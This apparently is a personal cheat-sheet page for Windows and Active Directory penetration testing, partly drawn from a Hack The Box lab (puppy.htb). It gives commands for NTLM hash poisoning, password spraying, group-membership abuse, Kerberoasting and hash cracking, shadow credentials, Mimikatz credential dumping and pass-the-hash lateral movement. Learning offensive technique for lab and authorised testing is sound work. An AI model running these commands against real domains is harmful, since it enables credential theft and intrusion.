A guide for Windows system enumeration and post-exploitation techniques.

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
This can be resolved by running the following
sudo timedatectl set-ntp off
sudo ntpdate <target>

Attacking Methods

Network

# Capture NTLM hashes with Responder
responder -I <interface> -P -r -v    # -P: Poison, -r: answers requests, -v: verbose
# Capture NTLM hashes with Inveigh
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -IP 172.16.7.50 -FileOutput Y
# or execute directly
Inveigh.exe

User

Requires one valid domain user:

# List domain users
## Using deprecated crackmapexec
crackmapexec smb <DC-IP> --users -u <username> -p <password>
 
## Using new netexec
nxc smb <DC-IP> -u <username> -p <password> --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt
 
# Extract usernames to file
cat users.txt | awk '{ print $5 }' | cut -d '\\' -f2 > valid_users.txt
 
# Password spraying (use with caution - may lock accounts)
nxc smb <DC-IP> -u valid_users.txt -p <password>

Active Directory

# BloodHound collection
bloodhound-python -u '<username>' -p '<password>' \
  -ns <DC-IP> \
  -d <domain> \
  -c all \
  --zip

Exploit

Abusing AD-DACL: GenericWrite

# From Linux
## Using net rpc
net rpc group addmem "group" "username" -U "domain"/'username'%'password' -S <DC-IP>
### Example:
net rpc group addmem "DEVELOPERS" "levi.james" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S 10.10.11.70
 
## Using bloodyAD
bloodyAD --host <DC-IP> -d <domain> -u <username> -p <password> add groupMember <group> <username>
### Example:
bloodyAD --host "10.10.11.70" -d "puppy.htb" -u "levi.james" -p 'KingofAkron2025!' add groupMember "DEVELOPERS" "levi.james"

As the user is now part of the group, we can try a targeted Kerberoast attack:

python3 targetedKerberoast.py -v -d "domain" -u "username" -p "password"
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ca_svc)
...

Ended up with list of Kerberos 5 TGS-REP etype 23 hashes, at this point, either trying to crack it with hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt or use certipy for shadow credential attack:

certipy shadow auto -u <username>@<domain> -p 'password' -k -dc-host <domain_controller> -account <targeted_account>
 
Certipy v5.0.2 - by Oliver Lyak (ly4k)
 
...

Post-Exploitation

Mimikatz:

# Elevate to SYSTEM
getsystem
# Load Mimikatz in Meterpreter
load kiwi
creds_all    # Dump credentials

Lateral Movement:
With Administrator credentials, use psexec to move laterally: Hash Format Requirement:

Correct format: [LM hash]:[NT hash]

Example: 00000000000000000000000000000000:actualNTLMhashhere
# Perform directly on Meterpreter
use exploit/windows/smb/psexec
set RHOST
set SMBUser Administrator
set SMBPass <hash_with_0s>
set LHOST

Recent Notes

Finding SHA1 from Amcache.hve

Writing

What is up with NordVPN

Windows Pentest

Analyze artifacts to extract IOCs